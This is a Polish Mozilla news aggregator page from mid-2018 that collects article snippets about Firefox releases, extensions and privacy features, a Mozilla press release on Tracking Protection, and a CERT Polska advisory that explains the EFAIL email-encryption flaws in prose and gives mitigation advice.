Polska Planeta Mozilli

Subskrypcje

Serwisy

Blogi



Kanał RSS

Ostatnia aktualizacja:
21 czerwca 2018, 19:10

Powered by Venus

Zgłoś błąd
Kontakt

19 czerwca 2018

CERT Polska

Analiza złośliwego oprogramowania Backswap

Artykuł Analiza złośliwego oprogramowania Backswap pochodzi z serwisu CERT Polska.

Hubert Barc, 19 czerwca 2018, 11:01

18 czerwca 2018

Dobre programy

Firefox jak kameleon. Rozszerzenie zmieni User Agent i utrudni śledzenie

image Zachowanie prywatności w Internecie to trudne zadanie. A gdyby przeglądarka mogła zmieniać zostawiany na stronach ślad jak kameleon? Zapewni to nowe rozszerzenie Chameleon dla Firefoksa. Chameleon to otwartoźródłowe rozszerzenie, które pozwala ukryć wiele informacji o przeglądarce przed potencjalnie śledzącymi stronami. Jego głównym zadaniem jest modyfikacja „odcisku palca”, jaki zostawia…
Anna Rymsza, 18 czerwca 2018, 20:10

Firefox będzie lepszym źródłem informacji niż Facebook, trwają testy polecanych artykułów

imageWielu użytkowników zna z pewnością Pocket, aplikację ułatwiającą zarządzanie artykułami i pozwalającą na wygodne odkładanie ich na później, by lekturze oddać się w bardziej dogodnym momencie. Okazuje się, że taka forma może stać się źródłem danych o artykułach, które można wykorzystać, by stworzyć listę interesujących wiadomości i konkurować pod tym względem z Facebookiem. Tak przynajmniej…
Oskar Ziomek, 18 czerwca 2018, 16:28

15 czerwca 2018

Dobre programy

Cliqz: niegdyś funkcja testowa Firefoksa, dzisiaj – nowa przeglądarka

imageUżytkownicy doceniający przeglądarki internetowe bazujące na Firefoksie powinni zwrócić uwagę na kolejną propozycję na rynku, a mowa jest o przeglądarce Cliqz. Jeśli nazwa wydaje się znajoma, to jest to słuszne wrażenie. Cliqz występuje już bowiem jako dodatek do Firefoksa, a wcześniej była to również testowa funkcja w ramach projektu Test Pilot. Jak widać, ostatecznie jednak pomysł oddzielił się…
Oskar Ziomek, 15 czerwca 2018, 11:37

Nowy iOS miał być wyzwaniem dla policji, ale podobno zabezpieczenia już złamano

image System iOS 12 dostanie nowe zabezpieczenie. USB Restricted Mode w skrócie zamienia port Lightning z interfejs służący jedynie do ładowania, jeśli urządzenie nie było odblokowane w ciągu ostatniej godziny. Są oczywiście osoby zdeterminowane, by je obejść – służby śledcze, prowadzące dochodzenia w sprawach kryminalnych. Zabezpieczenie jest już obecne w becie iOS-a 12. Po podaniu tej…
Anna Rymsza, 15 czerwca 2018, 10:50

12 czerwca 2018

Dobre programy

iPhone wreszcie ze złączem USB? To może być koniec epoki Lightning

imageApple pozostaje jedynym dużym producentem smartfonów, który w kwestii złączy pozostaje przy własnych rozwiązaniach. Niebawem może się to jednak zmienić i wreszcie zobaczymy iPhone’a z USB Type-C. Obecnie użytkownicy mobilnych iUrządzeń muszą posiadać własne kable do ładowania, nie mogą tak łatwo pożyczyć ładowarki od Samsunga, LG czy Xiaomi. Jak informuje serwis DigiTimes, Apple zamierza…
Mateusz Budzeń, 12 czerwca 2018, 12:20

8 czerwca 2018

Dobre programy

Rozszerzenie Universal Bypass szybko ominie strony skracarek linków

image Narzędzia skracające linki mogą sprawić, że przeglądanie stron będzie mniej przyjemne, ale na to również mamy sposób – rozszerzenie Universal Bypass dla przeglądarek Chrome i Firefox. To otwarte rozszerzenie, które pozwala ominąć strony pośredniczące między stroną skracającą i docelową. Zapewne nie raz trafiliście na usługę skracania odnośników, która przed przekierowaniem wyświetla…
Anna Rymsza, 8 czerwca 2018, 10:31

6 czerwca 2018

Dobre programy

Masz pomysł na motyw do Firefoksa? Teraz łatwo go stworzysz i udostępnisz

imagePrzeglądarki internetowe nie różniłyby się od siebie wiele, gdyby nie dostępne do nich dodatki. W przypadku Firefoksa użytkownicy mogą liczyć nie tylko na te rozszerzenia, które trafiają do oficjalnego sklepu, ale także eksperymentalne funkcje w ramach programu Test Pilot. Wczoraj opisywaliśmy możliwości testowanego tu dodatku Side View, ale to nie jedyne rozszerzenie na tapecie. Uwagę warto…
Oskar Ziomek, 6 czerwca 2018, 18:56

5 czerwca 2018

Dobre programy

Nowy dodatek do Firefoksa pozwala wygodnie przeglądać dwie strony naraz

imageUżytkownicy Firefoksa, którzy czuję potrzebę wyświetlania na ekranie dwóch stron jednocześnie, nie muszą już tworzyć nowego okna programu, by osiągnąć taki efekt. Mimo stale słabnącego zainteresowania przeglądarką, twórcy Firefoksa w ramach programu Test Pilot sprawdzają działanie kolejnych dodatków. Zainteresowani powinni zwrócić szczególną uwagę na rozszerzenie Side View. Dodatek ten pozwoli…
Oskar Ziomek, 5 czerwca 2018, 17:00

Popularność Firefoksa spada, dziś używa go mniej niż 10% internautów

imageNa stronie serwisu Netmarketshare pojawiły się nowe dane statystyczne związane z popularnością przeglądarek internetowych. Choć trend w większości przypadków został zachowany, warty uwagi jest wynik uzyskany przez Firefoksa na desktopach i laptopach – w maju z przeglądarki korzystało tylko 9,92% internautów. To pierwszy wynik Firefoksa poniżej 10% uzyskany w ostatnim czasie. Na pierwszym…
Oskar Ziomek, 5 czerwca 2018, 13:16

4 czerwca 2018

Dobre programy

Firefox będzie zintegrowany z siecią Tor, dostanie „superprywatne” przeglądanie

image Tor Project i Mozilla pracują nad wprowadzeniem obsługi sieci Tor na stałe do Firefoksa. Dzięki zastosowaniu transmisji danych przez „ciemny internet” przeglądarka uzyska tryb „superprywatny”, gwarantujący pełną anonimowość, szyfrowanie transmisji i możliwość obejścia blokad. W konsekwencji przestaniemy potrzebować projektu Tor Browser, czyli Firefoxa z przedłużonym wsparciem i odpowiednimi…
Anna Rymsza, 4 czerwca 2018, 10:10

29 maja 2018

Dobre programy

Wybraliśmy najlepsze nowe smartfony z minijackiem

imageWśród topowych smartfonów panuje trend pozbywania się złącza minijack, które umożliwia podłączenie większości modeli słuchawek. Producenci starają się nakłonić do korzystania z przejściówek, słuchawek Bluetooth czy tych podłączanych przez USB Type-C czy Lightning (iPhone). Większość użytkowników z tych zmian nie jest zadowolona. Postanowiliśmy więc wybrać najciekawsze topowe smartfony, które…
Mateusz Budzeń, 29 maja 2018, 14:49

23 maja 2018

Dobre programy

Firefox obsługuje uwierzytelnianie dwuetapowe – jak z niego korzystać?

imageMozilla zaktualizowała zabezpieczenia dostępne podczas logowania do konta Firefoksa. Od teraz można przy tym wymagać uwierzytelniania dwuetapowego, a więc poza hasłem, prosić użytkownika chcącego uzyskać dostęp także o inne potwierdzenie swojej tożsamości – w tym przypadku za pomocą dodatkowego kodu. Nowa metoda nie u wszystkich jest od razu widoczna i w niektórych przypadkach trzeba ją ręcznie…
Oskar Ziomek, 23 maja 2018, 11:25

22 maja 2018

Dobre programy

Ranking popularności przeglądarek: pozycja Firefoksa w Polsce może zaskakiwać

imageW Internecie bardzo często pisze się o popularności wybranych przeglądarek, ale statystyki dotyczą najczęściej danych z całego świata. Własne badania przeprowadziła w tym zakresie firma Gemius, publikując dane najchętniej wykorzystywanych przeglądarek internetowych w Polsce. Na pierwszym miejscu znalazł się Google Chrome, później Firefox, zaś na trzecim miejscu uplasowała się Opera. Różnice…
Oskar Ziomek, 22 maja 2018, 10:09

14 maja 2018

CERT Polska

Podatności w implementacjach OpenPGP oraz S/MIME: „EFAIL”

Niemieccy badacze bezpieczeństwa 14 maja 2018 roku opublikowali pracę dotyczącą występowania możliwych podatności bezpieczeństwa w niektórych implementacjach protokołów OpenPGP oraz S/MIME używanych m.in. do szyfrowania wiadomości e-mail. W niektórych przypadkach, atakujący posiadający dostęp jedynie do zaszyfrowanej wiadomości są w stanie odzyskać pełną treść odszyfrowanej wiadomości.

Dokonać można tego poprzez wysłanie odpowiednio zmodyfikowanej wiadomości do dowolnego z pierwotnych odbiorców. Podatne klienty poczty mogą wtedy w sposób automatyczny lub półautomatyczny, z udziałem użytkownika, odesłać atakującym odszyfrowaną treść.

W teorii, złośliwa modyfikacja wiadomości już po jej zaszyfrowaniu powinna być wykryta przez wykorzystanie mechanizmu uwierzytelniania wiadomości, tj. message authentication code. W praktyce okazuje się, że pomimo jego zastosowania (np. w postaci „Modification Detection Codes” w OpenPGP) w nowoczesnych trybach szyfrowania możliwe jest obejście tego zabezpieczenia. Źle skonfigurowana infrastruktura pośrednia czy programy pocztowe mogą łączyć niezaufane, doklejone części wiadomości w niebezpieczny sposób, bądź nie biorą pod uwagę braku albo niewłaściwego kodu uwierzytelniania.

Wyprowadzenie wiadomości w prezentowanych atakach odbywa się za pomocą dodania odpowiednio przygotowanych tagów HTML, których wyświetlenie w kliencie pocztowym spowoduje odesłanie na zewnętrzny serwer odszyfrowanej już wiadomości. Część klientów pocztowych w swojej domyślnej konfiguracji pozwala na automatyczne połączenie z zewnętrznym serwerem już w momencie odczytania wiadomości. Inne wymagają dodatkowego kliknięcia w wiadomości na spreparowany element interfejsu użytkownika.

Do czasu poprawienia błędów oraz zmiany domyślnych, niebezpiecznych ustawień klientów pocztowych obsługujących zaszyfrowane wiadomości radzimy wyłączyć wyświetlanie wiadomości w trybie HTML lub całkowicie wyłączyć obsługę automatycznego odszyfrowywania wiadomości i odszyfrowywanie ich poza klientem pocztowym.

Pełną pracę, zawierającą szczegóły techniczne można znaleźć pod adresem: https://efail.de/efail-attack-paper.pdf.

Szczególnie podatne (w tym na najprostszy wariant ataku) na dzień publikacji są: Apple Mail, aplikacja Mail na iOS, Thunderbird z Enigmail, Postbox oraz MailMate.

Artykuł Podatności w implementacjach OpenPGP oraz S/MIME: „EFAIL” pochodzi z serwisu CERT Polska.

Mateusz Szymaniec, 14 maja 2018, 11:41

10 maja 2018

Dobre programy

Nowy Firefox to pierwsza przeglądarka z obsługą logowania odciskiem palca

imageUżytkownicy Firefoksa mogą od wczoraj korzystać z nowego wydania z numerem 60. W przeglądarce pojawiło się kilka istotnych zmian, a w dodatku w przypadku wersji ESR jest to pierwsza edycja Firefoksa, która nie obsługuje innych dodatków niż WebExtensions. Z łatwością można więc uznać to wydanie za jedno z ważniejszych w historii rozwoju aplikacji, szczególnie z punktu widzenia osób sięgających po…
Oskar Ziomek, 10 maja 2018, 19:33

Firefox na Linuksie wykorzystuje pasek tytułowy. Inne aplikacje wezmą przykład?

imageOdkąd przeszliśmy (niemal) wszyscy na panoramiczne monitory, miejsca w pionie na ekranie jest zawsze za mało. W większości linuksowych środowisk graficznych tymczasem sporo pikseli dla każdego okna aplikacji jest zajętych przez standardowy pasek z widżetami okna i jego tytułem. Próbę odejścia od tej tradycji podjęli w 2010 roku deweloperzy Canonicala, tworząc podstawy pod linuksową…
Adam Golański, 10 maja 2018, 14:01

9 maja 2018

Dobre programy

Nowy Firefox to spore zmiany dla biznesu i łatwa automatyczna instalacja

image Na serwerach Mozilli zgodnie z planem pojawiła się już wersja 60 przeglądarki Firefox, a także Firefox 60 ESR z przedłużonym wsparciem. To wydanie jest szczególnie ważne dla osób korzystających ze ścieżki ESR (Extended Support Release), w której dotychczas aktualny był Firefox 52. Firefox 60 jest pierwszą wersją ESR, która nie współpracuje z rozszerzeniami starego typu, wtyczkami Java i…
Anna Rymsza, 9 maja 2018, 13:18

4 maja 2018

Dobre programy

Syncmarx to sposób na synchronizację zakładek między Chromem i Firefoksem

image Rozszerzenie do synchronizacji zakładek między przeglądarkami Xmarks przestało działać z początkiem maja, ale nie musieliśmy długo czekać na nowy zamiennik. Syncmarx jest dostępny dla przeglądarek Chrome i Firefox. Tworząc Syncmarx autor kierował się kluczowymi kryteriami, które spełniał Xmarks. Rozszerzenie musi być darmowe, synchronizować zakładki bez limitu i automatycznie, korzystać z…
Anna Rymsza, 4 maja 2018, 10:45

1 maja 2018

Dobre programy

Firefox dostanie linki sponsorowane – Mozilla pokaże, jak szanować prywatność

imageCztery lata temu Mozilla chciała sprzedać nam sponsorowane kafelki w Firefoksie, wyświetlane za każdym razem gdy otworzymy nową, pustą kartę w przeglądarce. Nikt chyba nie był tym zachwycony, więc w 2015 roku, bez podania przyczyny, sponsorowane kafelki zniknęły z Firefoksa. Teraz jednak najwyraźniej Fundacja znów wraca do swojego pomysłu zarabiania na sponsorowanych treściach. Czy mogą one…
Adam Golański, 1 maja 2018, 10:40

30 kwietnia 2018

Dobre programy

Firefox pomoże odciąć się od śledzenia przez Google, wystarczy użyć dodatku

imageOdcinanie się od śledzenia w Internecie staje się coraz popularniejsze. Jednym z bodźców, który w ostatnim czasie popycha do tego większa liczbę użytkowników jest sytuacja Facebooka i afera z Cambridge Analytica. W odpowiedzi ciekawe rozwiązanie zaproponowała Mozilla, oferując swoim użytkownikom rozszerzenie Facebook Containter – dodatek, który uruchamia w izolacji aktywność związaną właśnie z…
Oskar Ziomek, 30 kwietnia 2018, 09:58

29 kwietnia 2018

Dobre programy

Nowy Basilisk to idealna przeglądarka dla tęskniących za starym Firefoxem

image Jeśli nie podoba wam się kierunek rozwoju Firefoxa i tęsknicie za poprzednimi wersjami, rozwiązaniem może być przeglądarka Basilisk, której nowa wersja została wydana w tym tygodniu. Stoją za nią ci sami ludzie, co za dość popularną przeglądarką Pale Moon. Basilisk to otwarta przeglądarka, wykorzystująca silnik Goanna – fork Gecko, który znajdziemy w Firefoksie. Do rysowania interfejsu…
Anna Rymsza, 29 kwietnia 2018, 15:59

25 kwietnia 2018

Dobre programy

Opera Touch – całkowicie nowa przeglądarka Opery na smartfony

imagePowtarzane jak mantra tezy o skostniałym rynku przeglądarek to bujda. Dzieje się na tym rynku dużo, szczególnie teraz. Kluczową kwestią pozostaje optymalizacja i popularyzacja WebAssembly, ale zmiany zachodzą także w interfejsach i przeglądarkach mobilnych. Obok Firefoksa najbardziej znamienity przykład zachodzących zmian to Opera, która w maju zeszłego roku przeszła prawdziwe odrodzenie.…
Maciej Olanicki, 25 kwietnia 2018, 08:01

24 kwietnia 2018

Dobre programy

Nowy Thunderbird nie obsłuży wszystkich dodatków. Jak się do tego przygotować?

imageUżytkownicy popularnego klienta poczty Mozilla Thunderbird muszą przygotować się na duże zmiany w aplikacji. Wraz z wersją 60 (aktualnie dostępną jako beta), program przestanie obsługiwać znaczną część dodatków. To podobna sytuacja do tej, z którą mieliśmy do czynienia podczas premiery Firefoksa Quantum, gdy rozpoczęła się obsługa wyłącznie dodatków WebExtensions. Aby przekonać się o skali…
Oskar Ziomek, 24 kwietnia 2018, 14:50

23 kwietnia 2018

Dobre programy

W Firefoksie można korzystać z nowego notatnika. Jakie są jego możliwości?

imageTwórcy przeglądarki Firefox od dłuższego czasu testują niektóre ze swoich pomysłów w programie Test Pilot. Zbierają dzięki temu cenne informacje zwrotne od pierwszych użytkowników. Obok wygodnego sposobu na wysyłanie plików (Send) znaleźć tam można Notes, czyli dodatek pozwalający prowadzić pod ręką krótkie notatki. Warto przyjrzeć się mu z bliska, bo może okazać się przydatny na co dzień…
Oskar Ziomek, 23 kwietnia 2018, 16:53

18 kwietnia 2018

Dobre programy

Amazon zrobił przeglądarkę „Lite”. Trzeba pobrać tylko 2 MB

image Przeglądarek dla Androida nie brakuje, ale mimo tego Amazon udostępnił kolejną. Nazywa się po prostu Internet i wyróżnia się tym, że plik APK zajmuje mniej niż 3 MB. To w zasadzie jej jedyny plus. Chrome zajmuje około 21 MB, Edge 54 MB, Firefox 20 MB, Opera zaś 15 MB. Przeglądarka Amazonu jest bardzo uboga. Po uruchomieniu jej zobaczymy kolekcję linków do polecanych stron, a poniżej skrót…
Anna Rymsza, 18 kwietnia 2018, 14:55

11 kwietnia 2018

Dobre programy

Cenisz sobie prywatność? W Firefoksie odizolujesz się teraz także od YouTube'a

imageDużą popularnością cieszy się Facebook Container, wydany niedawno przez Mozillę oficjalny dodatek do Firefoksa, który izoluje użytkownika korzystającego z tytułowego Facebooka oraz Messengera i Instagramu od reszty Internetu. Celem jest rzecz jasna zwiększenie prywatności – dzięki temu inne strony mają nieco utrudnione zadanie, by użytkownika wyśledzić i przekazać portalom dodatkowe informacje…
Oskar Ziomek, 11 kwietnia 2018, 19:37

5 kwietnia 2018

Dobre programy

W Firefoksie bezpieczny nie tylko Facebook, nowy dodatek chroni jeszcze skuteczniej

imagePod koniec ubiegłego miesiąca Mozilla wywołała pozytywny uśmiech na twarzach wielu użytkowników Firefoksa. Udostępniono wówczas oficjalny dodatek do przeglądarki – Facebook Container, który pozwala swobodnie przeglądać zawartość portalu Facebook. Dzięki uruchamianiu go w izolowanym środowisku, nie trzeba obawiać się, że odwiedzając inne strony zapewniamy portalowi dostęp do kolejnych informacji o…
Oskar Ziomek, 5 kwietnia 2018, 18:44

Teoria „too big to fail” – czy Mozilla jest zbyt duża, by zniknąć?

imagePrzełomowe technologie mają tendencję do żywiołowego, skokowego wręcz wzrostu popularności, za czym w większości przypadków nie nadąża ani socjologia, ani prawo – nierzadko w stopniu podważającym fundamenty ustrojowe lub porządek gospodarczy. W ciągu kilku miesięcy okazuje się, że firma oferująca pewne unikatowe rozwiązanie całkowicie monopolizuje nowo powstały sektor branży, dopuszcza się czynów…
Kamil J. Dudek, 5 kwietnia 2018, 13:19

3 kwietnia 2018

Dobre programy

Premiera Firefox Reality – poznajcie nową przeglądarkę Mozilli

imageTrwa dobra passa Mozilli – po sukcesie, jakim okazała się pod koniec zeszłego roku kwantowa rewolucja, fundacja idzie za ciosem i prezentuje nowy wariant swojej przeglądarki. Z repozytorium GitHub można już pobrać do samodzielnej kompilacji kod programu Firefox Reality. Jak nietrudno się domyślić, jest to odmiana Liska dostosowana do gogli rozszerzonej i wirtualnej rzeczywistości. Jak dotąd…
Maciej Olanicki, 3 kwietnia 2018, 14:33

27 marca 2018

Dobre programy

Zostałeś na Facebooku? Firefox pozwala go bezpieczniej przeglądać

imageZamieszanie wokół Facebooka w wyniku ostatniej afery z Cambridge Analytica wykorzystują wszyscy i każdy robi to na swój sposób. Dla wielu jest to świetna okazja, by wreszcie pożegnać się z serwisem, usuwając konto w myśl akcji #deletefacebook, ale nie wszyscy chcą podchodzić do sprawy aż tak przewrotnie. Dla tych, którzy z serwisu nadal korzystają, ale chcieliby zrobić coś, by czuć się w nim…
Oskar Ziomek, 27 marca 2018, 18:01

23 marca 2018

Dobre programy

Mozilla też bojkotuje Facebooka, ale to trudniejsze niż się wszystkim wydaje

image Skandal wiążący Facebooka z kampanią wyborczą Donalda Trumpa zbiera coraz większe żniwo. Ze współpracy z firmą zrezygnował już pierwszy duży reklamodawca – Mozilla. Być może to początek końca niepodzielnego władcy platform społecznościowych, ale gigant będzie upadał powoli. Fundacja Mozilla, prawdopodobnie najlepiej znana jako autor popularnej przeglądarki Firefox, ogłosiła, że wstrzymuje…
Anna Rymsza, 23 marca 2018, 09:39

21 marca 2018

Dobre programy

Test Firefoksa miał zwiększyć prywatność, ale testerzy boją się wycieku swoich danych

imageIntencje były dobre, ale użytkownicy i tak zareagowali krzykiem. Czy dzisiaj już nie można oczekiwać nawet od dobrowolnych testerów zgody na eksperymenty w zakresie prywatności? Inżynierowie Mozilli muszą teraz zastanawiać się, jak wyjść z twarzą z eksperymentu z protokołem DoH (DNS over HTTPS), dzięki któremu będzie można ukryć przed dostawcami Internetu to, o jakie domeny…
Adam Golański, 21 marca 2018, 12:03

19 marca 2018

Dobre programy

Hasło główne Firefoksa już 9 lat temu było niewiele warte. Dzisiaj jest już nic niewarte

imageOd swojego powstania Firefox (oraz klient poczty Thunderbird) korzystał z mechanizmu hasła głównego. W ustawieniach użytkownik mógł sobie wprowadzić hasło, z którego tworzony był klucz używany do zaszyfrowania haseł do witryn internetowych przechowywanych w programie. Ich użycie czy zobaczenie wymagało wpierw wprowadzenia takiego hasła głównego, chroniąc przed np. wykradzeniem pliku z bazą…
Adam Golański, 19 marca 2018, 09:51

15 marca 2018

Dobre programy

Warto przetestować mobilnego Firefoksa. Z nowym silnikiem ma być 2 razy szybszy

imagePocząwszy od drugiej połowy ubiegłego roku, Mozilla robi wszystko, by desktopowy Firefox był znów chętnie wybieraną przeglądarką. Przez lata zaniedbań program stał się ociężały, ale nadal oferował dodatki, które czyniły go użytecznym. Mozilla postanowiła jednak postawić wszystko na jedną kartę: przeprojektować interfejs, zmienić wiele pod maską i ostatecznie przejść wyłącznie na dodatki…
Oskar Ziomek, 15 marca 2018, 14:58

Firefox jako uniwersalna paczka na Ubuntu. Gorszego formatu nie dało się wymyślić

imageZa każdym razem gdy spotykamy się z tematem uniwersalnych paczek oprogramowania na Linuksa, czy to snapów czy flatpaków, mamy wrażenie że te lekarstwa na chorobę braku interoperacyjności między poszczególnymi dystrybucjami są gorsze od samej choroby. Weźmy za przykład popularnego Firefoksa, wydanego właśnie w stworzonym i popularyzowanym przez Canonicala formacie snap. Pierwsze co zdumiewa,…
Adam Golański, 15 marca 2018, 12:58

14 marca 2018

Dobre programy

Rozszerzenie dla Firefoksa pomoże ci opanować bałagan w zakładkach

image Poskromienie bałaganu w zakładkach zebranych w Firefoksie nie musi zajmować dużo czasu. Warto skorzystać z rozszerzenia Bookmarks Organizer, wydanego właśnie w nowej wersji ze sporą porcją poprawek. Bookmarks Organizer to rozwijane od końca ubiegłego roku rozszerzenie typu WebExtension dla nowych wydań Firefoksa. Wersja 2.0 działa z Firefoksem 59. Zadaniem rozszerzenia jest znajdowanie…
Anna Rymsza, 14 marca 2018, 15:29

13 marca 2018

Dobre programy

Nowy Firefox pokaże stronom co im wolno: wreszcie wygodna kontrola uprawnień

imageDzisiaj debiutuje druga już od czasów wydania Firefoksa 57 Quantum duża aktualizacja przeglądarki, która kiedyś odmieniła Internet, a dziś musi walczyć o to, by wciąż się w Internecie liczyć. Firefox 59, którego od kilku tygodni mogliśmy testować w kolejnych kompilacjach z kanału beta dowodzi, że Mozilla idzie dobrą ścieżką. Czy jednak przekłada się to na zainteresowanie internautów? Oba…
Adam Golański, 13 marca 2018, 10:24

28 lutego 2018

Dobre programy

System dla miliardów wykluczonych: kuzyn Firefox OS-a zaistniał w nowej Nokii 8110

imageNiespełna trzy lata pojawiło się ostatnie wydanie mobilnego systemu Firefox OS. Wtedy też pokazano ostatni telefon z systemem Mozilli, ZTE Open L. Potem producent pogodził się z rzeczywistością i zakończył swój kilkuletni eksperyment z pomyleniem systemu operacyjnego z przeglądarką webową. Teraz jednak wygląda na to, że Firefox OS nie całkiem umarł (i nie mamy na myśli…
Adam Golański, 28 lutego 2018, 13:40

20 lutego 2018

Dobre programy

Od maja Firefox wyłączy niebezpieczny protokół FTP, wkrótce go usunie

image W imię bardziej restrykcyjnej ochrony bezpieczeństwa użytkowników przeglądarki coraz częściej blokują nieszyfrowane połączenia. Firefox 60 także pójdzie dalej w tym kierunku i umożliwi nam wyłączenie obsługi połączeń FTP w ustawieniach. Dbałość o szyfrowanie połączeń leży na sercu producentów przeglądarek od lat. Już w 2014 roku była mowa o tym, że Chrome będzie ostrzegał przed połączeniami…
Anna Rymsza, 20 lutego 2018, 12:51

12 lutego 2018

Dobre programy

Netflix w FullHD już nie tylko na Edge – pomogą dodatki do Chrome i Firefoksa

imageNetflix swoich klientów, którzy oglądają treści na PC, dzieli na dwie kategorie. Pierwsza to korzystający z jedynej słusznej przeglądarki Microsoft Edge, druga to ci, którzy korzystają z innych przeglądarek. Pierwsi są lepsi – oferuje się im streaming w rozdzielczości 1080p. Drudzy… no cóż. Bez względu na możliwości łącza jak i wykupienie pakietu Standard, dostają jedynie 720p.…
Adam Golański, 12 lutego 2018, 10:11

31 stycznia 2018

Dobre programy

Krytyczna luka w Firefoksie. Pod ochroną tylko użytkownicy najnowszej wersji

imageW Firefoksie wyryto lukę, którą atakujący może wykorzystać do wykonania kodu z takimi samymi uprawnieniami, jak użytkownik. Choć wcześniej konieczne byłoby nakłonienie internauty do kliknięcia w link lub otwarcia pliku, luka uznana została na krytyczną, gdyż docelowo pozwala atakującemu wykonać niemal dowolny kod – jeśli użytkownik korzysta z podniesionych uprawnień, atakujący również je zyskuje…
Oskar Ziomek (o.zio), 31 stycznia 2018, 16:05

30 stycznia 2018

Dobre programy

Rozszerzenia nowego Firefoksa zaczynają potrafić to, co potrafiły rozszerzenia starego

imageOstateczne porzucenie przez Mozillę platformy XUL w Firefoksie kosztowało nas wszystkich tysiące klasycznych rozszerzeń tej przeglądarki, które z dnia na dzień przestały działać. Setki tych najlepszych i najpopularniejszych w jakimś stopniu udało się przenieść na nową, obsługującą webowe języki programowania platformę WebExtensions. Szybko jednak zobaczyliśmy, że z ich jakością bywa…
Adam Golański (eimi), 30 stycznia 2018, 16:06

25 stycznia 2018

Dobre programy

Nowy Tor Browser stawia na prostotę, by chronić prywatność mógł każdy

imageUmożliwiająca nawiązanie połączenia z węzłami sieci tor przeglądarka Tor Browser otrzymała aktualizację, która podnosi numer wersji do 7.5. Wśród zmian znalazł się odświeżony ekran powitalny. Został przeprojektowany, by stać się łatwiejszym w użyciu nawet dla osób, które stawiają w deep weeb pierwsze kroki. Nowa wersja Tor Browser bazuje na Firefoksie ESR 52.6, przeglądarce Mozilli z…
Mateusz Budzeń (Scorpions.B), 25 stycznia 2018, 20:06

Centrum prasowe Mozilli

Szybsza i lepsza ochrona prywatności w ramach opcji Opt-in Tracking Protection oraz inne zmiany w najnowszym wydaniu Firefox Quantum

Coraz częściej rzeczy, których nie zaakceptowalibyśmy w świecie fizycznym, akceptujemy w świecie on-line. Na przykład, jak byście się poczuli, gdybyście zajrzeli na chwilę do sklepu, po czym przez kolejny miesiąc otrzymywalibyście pocztą ulotki z jego ofertą, mimo że nic tam nie kupiliście? Strony, które odwiedzamy w Internecie często nas śledzą, chociaż nie jest do końca jasne, kiedy i w jaki sposób wykorzystują zebrane na nasz temat informacje. Aby dolać oliwy do ognia, warto wspomnieć o tym, że proces ten dodatkowo spowalnia pracę naszych przeglądarek.

Międzynarodowy Dzień Ochrony Danych Osobowych, który obchodzimy 28 stycznia, jest więc doskonałą okazją, aby porozmawiać o jednej z najpotężniejszych funkcji Firefox Quantum, a mianowicie o Opt-in Tracking Protection. Ochrona przed śledzeniem została uruchomiona w trybie przeglądania prywatnego dwa lata temu jako coś zupełnie nowego na rynku. Użytkownicy mogli swobodnie przeglądać strony internetowe w trybie prywatnym, bez obawy przed śledzeniem i zalewem niechcianymi reklamami. Dokładnie przyjrzeliśmy się tej opcji i odkryliśmy, że oprócz ochrony prywatności, pozwala użytkownikom szybciej i sprawniej przeglądać witryny w Internecie, gdy strony ładują się bez trackerów. Dlatego też w listopadzie dodaliśmy w Firefox Quantum opcję, która oferuje naszym użytkownikom możliwość włączenia ochrony śledzenia 24/7. Wyniki testu znajdziesz tutaj.

Jedną z najważniejszych zalet włączonego Tracking Protection było szybsze i sprawniejsze przeglądanie stron internetowych. A przecież każdy lubi szybką przeglądarkę. Zobacz wideo: https://youtu.be/pDZXaegVuUE

Aby włączyć ochronę przed śledzeniem, wystarczy otworzyć folder „Preferencje” i kliknąć opcję „Prywatność i bezpieczeństwo”. Przewiń w dół, aby przejść do „Ochrona przed śledzeniem,” i kliknij „Zawsze”. Opcja Tracking Protection właśnie została uruchomiona.

Jest również dostępna na urządzeniach mobilnych. Aby zobaczyć, jak uruchomić ją
w swoim telefonie, kliknij w linki  Firefox for iOS lub Android.

Znacznie szybszy Firefox for Fire TV

Korzystając z rozwiązań ochrony śledzenia, które stosujemy w Firefox i Firefox Focus, tryb „Turbo” będzie dostępny w tym tygodniu również w Firefox for Fire TV. Dlaczego „turbo”? Ponieważ zapewnia szybsze i mniej zamglone przeglądanie witryn www. Funkcja ta jest włączona domyślnie, jednak przy włączonym trybie „Turbo”, mogą wystąpić sytuacje, w których wystąpi problem z ładowaniem strony. W takich przypadkach funkcja ta może być zarządzana z Menu.

Nowe funkcje w najnowszej wersji Firefoksa

Najnowsza wersja bazuje na mocnych fundamentach, zapewnionych przez Firefox Quantum i oferuje nowe możliwości i funkcje w przeglądarce Firefox na Androida.

Szybszy i bardziej płynny dostęp do Internetu dzięki lepszej grafice

Każdy z Was na pewno czekał kiedyś cierpliwie aż dana strona się załaduje. Rozmazane zdjęcia i tekst, wszystko jeszcze bardziej spowalnia, a w końcu strona się zawiesza. Zapewniamy, że robimy wszystko, aby zminimalizować liczbę takich sytuacji w Firefoksie. Aby pomóc zredukować nieprawidłowości, Firefox Quantum wprowadza ulepszony silnik, wykorzystujący dedykowany procesor CPU. Efektem tej poprawy jest fakt, że Firefox Quantum jest teraz jeszcze szybszy, a na wielu stronach internetowych – znacznie bardziej płynny. Skąd to wiemy? Nasi inżynierowie stworzyli test, który symuluje działanie ciężkiego JavaScriptu. Podczas wykonywania tego testu, szybkość odświeżania Firefoksa poprawiła się o 30% (z 31 do 40 klatek na sekundę).  Tutaj możesz przeczytać więcej na ten temat.

Dane na podstawie testu Mozilli, opisanego tutaj.

 

To solidny postęp, ale nie zatrzymujemy się. Obecnie pracujemy nad integracją WebRender, rozwiniętego w ramach projektu badawczego Servo, z przeglądarką Firefox Quantum. Mamy nadzieję, że WebRender sprawi, iż Firefox Quantum będzie oferował jeszcze większą liczbę klatek na sekundę. W ciągu kolejnych miesięcy, opowiemy więcej na ten temat.

Nowe funkcje Firefox for Android

Jeśli jeszcze nie zainstalowałeś nowej wersji Firefox Quantum, zapraszamy do pobrania najnowszej wersji tutaj.

 

 

 

 

 

Centrum prasowe Mozilli, 25 stycznia 2018, 14:26

28 stycznia obchodzimy Europejski Dzień Ochrony Danych Osobowych. Firefox wprowadziło możliwość ochrony przed śledzeniem 24/h

Nie zatrzymujemy się – wprowadzamy kolejne usprawnienia w Firefoksie, aby działał jeszcze szybciej i sprawniej. Dzięki najnowszej wersji przeglądarki, użytkownicy mają kontrolę nad tym przez kogo i kiedy są śledzeni w sieci.

